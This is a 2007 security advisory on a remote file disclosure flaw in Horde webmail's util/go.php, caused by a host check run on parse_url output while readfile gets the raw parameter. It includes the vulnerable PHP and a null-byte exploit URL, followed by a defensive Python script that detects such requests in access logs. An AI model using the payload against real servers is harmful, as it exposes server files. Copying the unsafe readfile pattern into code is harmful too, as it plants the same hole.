----[ Horde Web-Mail Remote File Disclosure ... ITDefence.ru Antichat.ru ]

Horde Web-Mail Remote File Disclosure
Eugene Minaev underwater@itdefence.ru

-[ ITDEFENCE.ru Security advisory ]- 2007

At first glance, this code is not vulnerable and we can only read remote files.

<?php

if (empty($_GET['url'])) {
    exit;
}

// The host check below works on the parse_url() result ...
if (get_magic_quotes_gpc()) {
    $url = @parse_url(stripslashes($_GET['url']));
} else {
    $url = @parse_url($_GET['url']);
}

.....

if ((!empty($_SERVER['SERVER_NAME']) && $_SERVER['SERVER_NAME'] == $url['host']) ||
    (!empty($_SERVER['HTTP_HOST']) && $_SERVER['HTTP_HOST'] == $url['host'])) {

.....

    // ... but readfile() receives the raw, unparsed parameter.
    if (!empty($_GET['untrusted'])) {
        readfile($_GET['url']);
        exit;
    }

?>

But parse_url is only a set of regular expressions, and we can use a null byte to deceive the function.

http://test1.ru/horde/util/go.php?untrusted=1&url=test.php%00http://another.host/

----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]
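A detection check for the request pattern above, as an added example that is not part of the original advisory: it scans web-server access log lines for requests to util/go.php whose url parameter carries a NUL byte. The common/combined log format, the sample lines and addresses are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Request line of a common/combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

# Constructed sample lines; client addresses come from documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2007:10:00:00 +0000] "GET /horde/util/go.php?url=http%3A%2F%2Fwebmail.example%2Fhelp HTTP/1.1" 302 0',
    '198.51.100.7 - - [01/Jan/2007:10:00:05 +0000] "GET /horde/util/go.php?untrusted=1&url=test.php%00http://webmail.example/ HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2007:10:00:09 +0000] "GET /horde/util/go.php?untrusted=1&url=test.php%2500http://webmail.example/ HTTP/1.1" 200 0',
    '192.0.2.10 - - [01/Jan/2007:10:00:12 +0000] "GET /horde/imp/mailbox.php?x=%00 HTTP/1.1" 200 900',
]


def classify(target):
    """Return a reason if the request target matches the go.php pattern, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/util/go.php"):
        return None
    # parse_qs percent-decodes once, as PHP does when it fills $_GET.
    for value in parse_qs(parts.query, keep_blank_values=True).get("url", []):
        if "\x00" in value:
            return "NUL byte in url parameter"
        if "%00" in value:
            # Still encoded after one decode: probing, or aimed at a second decoder.
            return "double-encoded NUL in url parameter"
    return None


def scan(lines):
    """Return (line_number, client, reason) for every suspicious log line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        reason = classify(match.group(1))
        if reason:
            hits.append((number, line.split(" ", 1)[0], reason))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```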